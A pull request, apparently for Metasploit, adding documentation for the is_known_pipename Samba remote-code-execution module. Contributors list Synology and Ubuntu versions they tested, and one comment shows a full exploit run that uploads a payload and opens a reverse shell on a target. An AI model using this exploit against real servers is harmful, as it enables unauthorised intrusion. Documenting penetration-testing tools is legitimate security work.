### PR TITLE
docs for is_known_pipename

### PR DESCRIPTION
**Pull request by h00die**
Adds docs, plus keeps track of what people have and haven't had success with.

There are 4 spots that need more info, 2 from you @hdm , one from @OJ , and one from @wwebb-r7

But, its good to go none the less.

### CODE REVIEW

File: documentation/modules/exploit/linux/samba/is_known_pipename.md [hunk 1]
```diff
@@ -0,0 +1,96 @@
...
+
+However, in some cases anonymous access with common filesystem locations can be used to automate exploitation.
+
+Verified on:
+
+1. Synology DS412+ DSM 6.1.1-15101 Update 2 (Samba 4.4.9)
+2. Synology DS412+ DSM 6.1.1-15101 Update 3 (Samba 4.4.9)
+3. Ubuntu 16.04 (**HDM PLEASE PUT THE Samba version here**)
+4. Synology **HDM PLEASE PUT THE DSM VERSION HERE** (**HDM PLEASE PUT THE Samba version here**)
+5. Synology DS1512+ **OJ PLEASE PUT THE DSM VERSION HERE** (**OJ PLEASE PUT THE Samba version here**)
```
Comment (OJ) [inline documentation/modules/exploit/linux/samba/is_known_pipename.md]: DSM Version stuff:
```
DSM 6.1.1-15101 Update 2
```
Samba version stuff:
```
Version 4.4.9
```

Comment (OJ) [inline documentation/modules/exploit/linux/samba/is_known_pipename.md]: Have updated to `DSM 6.1.1-15101 Update 3` and it still works (`Samba 4.4.9` as well).

Comment (KingJiJi) [inline documentation/modules/exploit/linux/samba/is_known_pipename.md]: Exploit failed: TypeError can't dup NilClass ?

**Comment by wwebb-r7** [comment]
My failure was against a WD MyCloud 4TB running Samba 4.0.0rc5

I'd add it myself but it appears to be an issue with the armle stub at this time.

**Comment by aconite33** [comment]
Ubuntu 14.04.05, x64
Samba 4.3.9

```
msf exploit(is_known_pipename) > run
[*] Started reverse TCP handler on 192.168.1.3:4444 
[*] 192.168.1.5:445 - Using location \\192.168.1.5\share\ for the path
[*] 192.168.1.5:445 - Payload is stored in //192.168.1.5/share/ as gVvHMTVH.so
[*] 192.168.1.5:445 - Trying location /volume1/gVvHMTVH.so...
...
[*] 192.168.1.5:445 - Trying location /tmp/gVvHMTVH.so...
[*] Command shell session 3 opened (192.168.1.3:4444 -> 192.168.1.5:45790) at 2017-05-05 02:44:06 -0400

id
uid=65534(nobody) gid=0(root) egid=65534(nogroup) groups=65534(nogroup)
uname -a
Linux ubuntu 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:07:32 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
dpkg -l samba
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name                               Version                          Architecture Description
+++-==================================-================================-============-===============================================================================
ii  samba                              2:4.3.9+dfsg-0ubuntu0.14.04.3    amd64        SMB/CIFS file, print, and login server for Unix
```

**Pull request merged**